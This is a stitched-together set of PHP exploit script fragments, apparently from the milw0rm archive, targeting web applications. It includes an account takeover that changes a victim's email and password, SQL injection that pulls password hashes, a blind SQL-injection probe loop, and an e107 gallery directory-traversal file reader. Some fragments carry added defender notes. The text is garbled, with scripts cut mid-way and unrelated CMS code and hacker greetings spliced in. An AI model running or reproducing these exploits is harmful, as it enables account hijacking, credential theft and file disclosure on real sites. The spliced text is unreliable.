sendpacket($packet2); if (stristr($html, 'i=1') == true) { die('Error : Incorrect username or password! Try again!'); } else { if (stristr($html, 'i=5') == true) { die('Error : Someone is currently using that account!'); } else { $RandMail = substr($PHPSESSID, 10, 6) . '*****@*****.**'; } } $Query3 = $path . 'index.php?n=modules/panel&a=2&tmp[authorization]=4'; $packet3 = "POST \n{$Query3}&editpassword=&editpassword2=&editemail={$RandMail}&edittemplate=default&editurl=&editflag=none&editday=0&editmonth=0&edityear=0&edithideemail=0&editcalendarbday=0&editmsn=&edityahoo=&editicq=&editaim=&editskype=&editsignature=&editaboutme=&PHPSESSID={$PHPSESSID} \nHTTP/1.1\r\n"; $packet3 .= "User-Agent: Shareaza v1.x.x.xx\r\n"; $packet3 .= "Host: " . $host . "\r\n"; $packet3 .= "Connection: Close\r\n\r\n"; sendpacket($packet3); if (stristr($html, 'i=26') == false) { die('Exploit Failed'); } $Query4 = $path . 'index.php?n=modules/login&a=1'; $packet4 = "POST {$Query4}&PHPSESSID={$PHPSESSID} HTTP/1.1\r\n"; $packet4 .= "User-Agent: Shareaza v1.x.x.xx\r\n"; $packet4 .= "Host: " . $host . "\r\n"; $packet4 .= "Connection: Close\r\n\r\n"; sendpacket($packet4); die('Exploit succeeded! You have Full access now!'); } ?>
-----------------------------7d6224c08dc Content-Disposition: form-data; name="State" aaaaaa -----------------------------7d6224c08dc Content-Disposition: form-data; name="Country" Iran -----------------------------7d6224c08dc Content-Disposition: form-data; name="Status" Active -----------------------------7d6224c08dc '; echo "Powered By Y! Underground Group\r\n"; echo "discovered&Coded By Dj7xpl\r\n"; echo "Sending Data To Target ...\n"; /*Sending Data*/ $packet = "POST " . $p . "admin/editusers.php?Uid=" . $uid . " HTTP/1.0\r\n"; $packet .= "Content-Type: multipart/form-data; boundary=---------------------------7d6224c08dc\r\n"; $packet .= "Content-Length: " . strlen($data) . "\r\n"; $packet .= "Host: " . $host . "\r\n"; $packet .= "Connection: Close\r\n\r\n"; $packet .= $data; sendpacket($packet); sleep(1); echo "Change Passw0rd Now!\n"; ?> # milw0rm.com [2007-04-30]
$sql = " FROM forum_userdata WHERE user_name='" . $username . "'/*"; $sql = urlencode($sql); if ($proxy == '') { $packet = "GET " . $path . "search.php?search=" . $sql . "&ao=phrase HTTP/1.1\r\n"; } else { $packet = "GET http://" . $host . $path . "search.php?search=" . $sql . "&ao=phrase HTTP/1.1\r\n"; } $packet .= "Client-IP: 127.0.0.1\r\n"; $packet .= "X-Forwarded-For: 127.0.0.1\r\n"; $packet .= "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/msword, */*\r\n"; $packet .= "Referer: http://" . $host . $path . "search.php\r\n"; $packet .= "Accept-Language: en\r\n"; $packet .= "Accept-Encoding: gzip, deflate\r\n"; $packet .= "User-Agent: Baiduspider+(+http://www.baidu.com/search/spider.htm)\r\n"; $packet .= "Host: " . $host . "\r\n"; $packet .= "Connection: Keep-Alive\r\n\r\n"; show($packet); sendpacket($packet, 0); $temp = explode(';<span class="category">(', $html); $temp2 = explode(')</span>', $temp[1]); $hash = $temp2[0]; echo '<br>username: '******' hash: ' . $hash; # debugging... //echo htmlentities($html); } else { echo '<br>fill in all requested fields, optionally specify a proxy...<br>'; } ?> # milw0rm.com [2005-09-22]
/**
 * Character-by-character probe loop against the `post` parameter of
 * `index.php?cmd=blog`, using response length as the yes/no signal.
 *
 * For each position $j it tries the values 1..126 for $i, appends the caller's
 * fragment $tsqli plus a position/value suffix to the URL, sends the request
 * through sendpacket(), and treats a response longer than 429 bytes as a
 * match, echoing chr($i).
 *
 * Defender notes: the traffic this produces is up to 126 GET requests per
 * position against a single URL, differing only in two trailing numbers and
 * carrying quote characters plus `limit` / `load_file` text in the query
 * string. That pattern is straightforward to alert on in access logs.
 * The durable fix is on the application side: integer-cast or bind `post`
 * rather than concatenating it into a query.
 * NOTE(review): the target's query code is not visible here; confirm.
 *
 * @param string $p     Path prefix placed before `index.php` in the request line.
 * @param string $msg   Label echoed once before probing starts.
 * @param string $tsqli Query-string fragment appended directly after `post=1`.
 * @return void Results are echoed; nothing is returned.
 */
function getlogindetails($p, $msg, $tsqli)
{
    echo $msg;
    $tempvar = "";
    $j = 1; // 1-based character position being probed
    // Loops while $tempvar holds no NUL byte; within this function $tempvar
    // only ever has "" appended to it.
    while (!strstr($tempvar, chr(0))) {
        // Candidate character codes 1..126 for the current position.
        for ($i = 1; $i <= 126; $i++) {
            // `!` binds tighter than `==`, so this reads (!strpos(...)) == true:
            // taken when "load_file" is absent from $tsqli or found at offset 0.
            if (!strpos($tsqli, "load_file") == true) {
                $sqli = $tsqli . "+limit+0,1)," . $j . ",1))='" . $i;
            } else {
                $sqli = $tsqli . ")," . $j . ",1))='" . $i;
            }
            $packet = "GET " . $p . "index.php?cmd=blog&post=1" . $sqli . " HTTP/1.1\r\n";
            // NOTE(review): $host is not a parameter and no `global` declaration
            // is visible in this function.
            $packet .= "Host: " . $host . "\r\n";
            $packet .= "Connection: Close\r\n\r\n";
            $html = sendpacket($packet);
            // Response length is the only signal used: over 429 bytes counts as a match.
            if (strlen($html) > 429) {
                echo chr($i);
                break;
            } elseif ($i === 126) {
                // Last candidate reached without a match; appends an empty string.
                $tempvar .= "";
                break;
            }
        }
        $j++;
    }
}
$DB->unbuffered_query("UPDATE {$db_prefix}statistics SET article_count=article_count" . $query . "1"); $DB->unbuffered_query("UPDATE {$db_prefix}users SET articles=articles" . $query . "1 WHERE userid='{$sax_uid}'"); } archives_recache(); hottags_recache(); categories_recache(); statistics_recache(); newarticles_recache(); if ($pingurl && $pingagain) { $pingurldb = explode("\n", $pingurl); foreach ($pingurldb as $pingurl) { $pingurl = trim($pingurl); if ($pingurl) { $url = str_replace('show&id', 'show&id', getpermalink($article['articleid'], $article['alias'])); $data = 'url=' . rawurlencode($url) . '&title=' . rawurlencode($article['title']) . '&blog_name=' . rawurlencode($options['name']) . '&excerpt=' . rawurlencode($article['content']); $result = sendpacket($pingurl, $data); /* if (strpos($result, 'error>0</error')) { //succ } else { //fa }*/ } } } if ($article['stick'] != $stick) { stick_recache(); } $location = getlink('article', 'mod', array('message' => 13, 'articleid' => $articleid)); } header("Location: {$location}");
[o] Greetz [o] ============== MainHack BrotherHood [ http://news.serverisdown.org ] Vrs-hCk OoN_BoY Paman bL4Ck_3n91n3 Angela Zhang H312Y yooogy mousekill }^-^{ loqsa zxvf martfella skulmatic OLiBekaS ulga Cungkee k1tk4t str0ke F**K TERORIS!! */
/*
 * Flat script: prints a two-field HTML form and, on submit, issues one GET
 * for the e107 `my_gallery` plugin's image.php with a `file` value made of
 * parent-directory segments followed by a file name, then prints the raw
 * response HTML-escaped.
 *
 * Defender notes: this is a directory-traversal (CWE-22) request shape.
 * Server-side, a `file` parameter like this should be resolved with
 * realpath() and rejected unless the result stays inside the gallery
 * directory, or it should accept only a basename or allow-listed id.
 * In access logs, look for requests to
 * /e107_plugins/my_gallery/image.php whose `file` value contains `..`
 * segments, including percent-encoded forms.
 */

// Endpoint and parameter the request is built around.
$vuln = '/e107_plugins/my_gallery/image.php?file=';
// Run of parent-directory segments placed between the parameter and the file name.
$trasv = '/../../../../../../../../../../../../../../..';
// Opens the form; the matching </form> is echoed after the request branch below.
echo "<form method=POST>\nWeb 2 XPL : <input type=\"text\" name=\"host\" size=30>\nFile 2 Read : <input type=\"text\" name=\"file\" size=30>\n<input type=submit value=\"Go!!!\" name=\"_xpl\">\n<br><br>";
if ($_POST['_xpl']) {
    // NOTE(review): $data, $file and $host are not assigned anywhere in the
    // visible code before being read here.
    $data .= "GET /{$vuln}{$trasv}{$file} HTTP/1.1\r\n";
    $data .= "Host: {$host}\r\n";
    $data .= "Connection: close\r\n\r\n";
    $html = sendpacket($host, $data);
    // The response is HTML-escaped before being written into the page.
    print '<pre>' . htmlspecialchars($html) . '</pre>';
}
echo "</form>";

/**
 * Sends a raw request over a TCP connection to port 80 and returns everything
 * read back until end of stream.
 *
 * @param string $host Host name passed to fsockopen().
 * @param string $data Bytes written to the socket as-is.
 * @return string Concatenation of every line read from the socket.
 */
function sendpacket($host, $data)
{
    // `@` suppresses the connect warning; failure ends the script via die().
    if (!($sock = @fsockopen($host, 80))) {
        die("[!] Connection refused, try again!\n");
    }
    fputs($sock, $data);
    // $html is appended to without prior initialisation in this function.
    while (!feof($sock)) {
        $html .= fgets($sock);
    }
    fclose($sock);
    return $html;
}